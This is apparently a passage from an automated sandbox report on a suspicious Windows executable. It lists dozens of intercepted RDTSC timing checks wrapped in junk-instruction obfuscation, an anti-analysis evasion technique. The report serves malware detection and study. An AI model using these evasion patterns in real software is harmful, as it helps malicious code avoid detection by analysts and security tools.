Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 799E15 second address: 799E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC350C3E727h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC350C3E71Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 799E43 second address: 799E4C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 799F8F second address: 799F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 79D13E second address: 79D143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 79D143 second address: 79D14B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 79D14B second address: 79D163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FC3507E537Dh 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 79D163 second address: 79D169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7A2D14 second address: 7A2D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7A2D18 second address: 7A2D1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7A2D1C second address: 7A2D22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54D0053 second address: 54D0085 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushfd 0x0000000d jmp 00007FC350C3E729h 0x00000012 jmp 00007FC350C3E71Bh 0x00000017 popfd 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54D0085 second address: 54D00C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5388h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushfd 0x0000000c jmp 00007FC3507E5380h 0x00000011 xor eax, 56B42A58h 0x00000017 jmp 00007FC3507E537Bh 0x0000001c popfd 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54D00C6 second address: 54D0105 instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FC350C3E727h 0x00000011 pop esi 0x00000012 call 00007FC350C3E729h 0x00000017 pop eax 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54900C9 second address: 5490138 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ax 0x00000006 mov edx, esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FC3507E5383h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FC3507E537Bh 0x0000001b jmp 00007FC3507E5383h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007FC3507E5388h 0x00000027 and esi, 09EE1B38h 0x0000002d jmp 00007FC3507E537Bh 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0991 second address: 54B0997 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0997 second address: 54B099B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B099B second address: 54B099F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0551 second address: 54B0555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0555 second address: 54B0572 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0572 second address: 54B05AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 mov edx, 719C99DEh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f jmp 00007FC3507E5382h 0x00000014 mov dword ptr [esp], ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC3507E5387h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0253 second address: 54B0259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0259 second address: 54B025D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0F47 second address: 54B0F87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC350C3E71Ch 0x00000012 xor al, 00000008h 0x00000015 jmp 00007FC350C3E71Bh 0x0000001a popfd 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0F87 second address: 54B0FD8 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b call 00007FC3507E5383h 0x00000010 pop eax 0x00000011 pushfd 0x00000012 jmp 00007FC3507E5389h 0x00000017 add si, ED86h 0x0000001c jmp 00007FC3507E5381h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 55004E3 second address: 5500508 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E721h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC350C3E71Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5500508 second address: 550050E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 550050E second address: 5500512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5500512 second address: 5500516 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5500516 second address: 5500529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov edi, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e mov esi, 23982EBDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54D04A8 second address: 54D04E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5380h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007FC3507E537Ch 0x00000013 jmp 00007FC3507E5385h 0x00000018 popfd 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54D04E3 second address: 54D0501 instructions: 0x00000000 rdtsc 0x00000002 mov bl, ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 mov ch, 4Eh 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FC350C3E71Bh 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54D0501 second address: 54D0505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54D0505 second address: 54D050B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54D050B second address: 54D055A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, ecx 0x00000005 pushfd 0x00000006 jmp 00007FC3507E5384h 0x0000000b sbb ax, 7C08h 0x00000010 jmp 00007FC3507E537Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b jmp 00007FC3507E5386h 0x00000020 mov eax, dword ptr [ebp+08h] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54D055A second address: 54D055E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54D055E second address: 54D057B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0305 second address: 54B0309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0309 second address: 54B030F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B030F second address: 54B0315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0315 second address: 54B0319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0319 second address: 54B03B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FC350C3E722h 0x00000010 xor esi, 357ABB08h 0x00000016 jmp 00007FC350C3E71Bh 0x0000001b popfd 0x0000001c jmp 00007FC350C3E728h 0x00000021 popad 0x00000022 push eax 0x00000023 pushad 0x00000024 mov si, di 0x00000027 popad 0x00000028 xchg eax, ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FC350C3E720h 0x00000032 adc ah, FFFFFFC8h 0x00000035 jmp 00007FC350C3E71Bh 0x0000003a popfd 0x0000003b pushfd 0x0000003c jmp 00007FC350C3E728h 0x00000041 adc si, B228h 0x00000046 jmp 00007FC350C3E71Bh 0x0000004b popfd 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B03B6 second address: 54B03F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 1992C8CAh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f jmp 00007FC3507E5387h 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC3507E5385h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0EBD second address: 54C0ECD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC350C3E71Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0ECD second address: 54C0F07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E537Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007FC3507E5386h 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC3507E537Ah 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0F07 second address: 54C0F16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E71Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0F16 second address: 54C0F2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E5384h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54D02C7 second address: 54D02CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F0720 second address: 54F0726 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F0726 second address: 54F079F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007FC350C3E726h 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007FC350C3E720h 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 push edx 0x0000001a mov bh, ch 0x0000001c pop edx 0x0000001d popad 0x0000001e xchg eax, ecx 0x0000001f jmp 00007FC350C3E720h 0x00000024 push eax 0x00000025 jmp 00007FC350C3E71Bh 0x0000002a xchg eax, ecx 0x0000002b jmp 00007FC350C3E726h 0x00000030 mov eax, dword ptr [773265FCh] 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F079F second address: 54F07A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F07A3 second address: 54F07A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F07A9 second address: 54F07AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F07AF second address: 54F07B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F07B3 second address: 54F0843 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E537Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d pushad 0x0000000e movzx esi, di 0x00000011 movsx edi, si 0x00000014 popad 0x00000015 je 00007FC3C259850Bh 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FC3507E5380h 0x00000022 xor cx, 6668h 0x00000027 jmp 00007FC3507E537Bh 0x0000002c popfd 0x0000002d mov ah, 64h 0x0000002f popad 0x00000030 mov ecx, eax 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007FC3507E5381h 0x00000039 or cx, B086h 0x0000003e jmp 00007FC3507E5381h 0x00000043 popfd 0x00000044 jmp 00007FC3507E5380h 0x00000049 popad 0x0000004a xor eax, dword ptr [ebp+08h] 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F0843 second address: 54F0847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F0847 second address: 54F084B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F084B second address: 54F0851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F0851 second address: 54F0865 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E5380h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F0865 second address: 54F087F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E71Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and ecx, 1Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F087F second address: 54F0883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F0883 second address: 54F0887 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F0887 second address: 54F088D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F088D second address: 54F08A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E71Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ror eax, cl 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov esi, 6A3DAA83h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F08A5 second address: 54F08B2 instructions: 0x00000000 rdtsc 0x00000002 mov di, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 mov dx, si 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F08B2 second address: 54F08D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 leave 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC350C3E724h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F08D1 second address: 54F08D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F08D5 second address: 54F08DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F09FA second address: 54F0A09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E537Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A000A second address: 54A00F0 instructions: 0x00000000 rdtsc 0x00000002 mov edi, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FC350C3E724h 0x0000000d push eax 0x0000000e pushad 0x0000000f jmp 00007FC350C3E721h 0x00000014 pushfd 0x00000015 jmp 00007FC350C3E720h 0x0000001a jmp 00007FC350C3E725h 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 jmp 00007FC350C3E71Eh 0x00000027 mov ebp, esp 0x00000029 jmp 00007FC350C3E720h 0x0000002e and esp, FFFFFFF8h 0x00000031 pushad 0x00000032 mov di, si 0x00000035 mov ah, 18h 0x00000037 popad 0x00000038 push ecx 0x00000039 pushad 0x0000003a mov ecx, 1CD9B7C7h 0x0000003f pushfd 0x00000040 jmp 00007FC350C3E71Ch 0x00000045 and ecx, 7785F478h 0x0000004b jmp 00007FC350C3E71Bh 0x00000050 popfd 0x00000051 popad 0x00000052 mov dword ptr [esp], ecx 0x00000055 jmp 00007FC350C3E726h 0x0000005a xchg eax, ebx 0x0000005b jmp 00007FC350C3E720h 0x00000060 push eax 0x00000061 jmp 00007FC350C3E71Bh 0x00000066 xchg eax, ebx 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A00F0 second address: 54A00F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A00F4 second address: 54A00FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A00FA second address: 54A01B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 call 00007FC3507E5385h 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebx, dword ptr [ebp+10h] 0x00000012 jmp 00007FC3507E5387h 0x00000017 xchg eax, esi 0x00000018 pushad 0x00000019 push ecx 0x0000001a mov ecx, edi 0x0000001c pop edx 0x0000001d pushfd 0x0000001e jmp 00007FC3507E537Ch 0x00000023 add si, 5528h 0x00000028 jmp 00007FC3507E537Bh 0x0000002d popfd 0x0000002e popad 0x0000002f push eax 0x00000030 jmp 00007FC3507E5389h 0x00000035 xchg eax, esi 0x00000036 pushad 0x00000037 jmp 00007FC3507E537Ch 0x0000003c mov dl, cl 0x0000003e popad 0x0000003f mov esi, dword ptr [ebp+08h] 0x00000042 jmp 00007FC3507E537Dh 0x00000047 xchg eax, edi 0x00000048 jmp 00007FC3507E537Eh 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FC3507E537Dh 0x00000057 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A01B4 second address: 54A01BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A01BA second address: 54A0216 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E537Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b movzx ecx, dx 0x0000000e mov esi, edx 0x00000010 popad 0x00000011 test esi, esi 0x00000013 pushad 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FC3507E5381h 0x0000001b add cl, 00000016h 0x0000001e jmp 00007FC3507E5381h 0x00000023 popfd 0x00000024 call 00007FC3507E5380h 0x00000029 pop eax 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d mov edi, 4A0B93E4h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A0216 second address: 54A02B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FC3C2A3CB10h 0x0000000b jmp 00007FC350C3E71Fh 0x00000010 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000017 pushad 0x00000018 mov dx, si 0x0000001b popad 0x0000001c je 00007FC3C2A3CB05h 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FC350C3E723h 0x00000029 sbb eax, 50221F5Eh 0x0000002f jmp 00007FC350C3E729h 0x00000034 popfd 0x00000035 jmp 00007FC350C3E720h 0x0000003a popad 0x0000003b mov edx, dword ptr [esi+44h] 0x0000003e jmp 00007FC350C3E720h 0x00000043 or edx, dword ptr [ebp+0Ch] 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 call 00007FC350C3E71Dh 0x0000004e pop eax 0x0000004f pushad 0x00000050 popad 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54A02B2 second address: 54A02C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E5383h 0x00000009 rdtsc
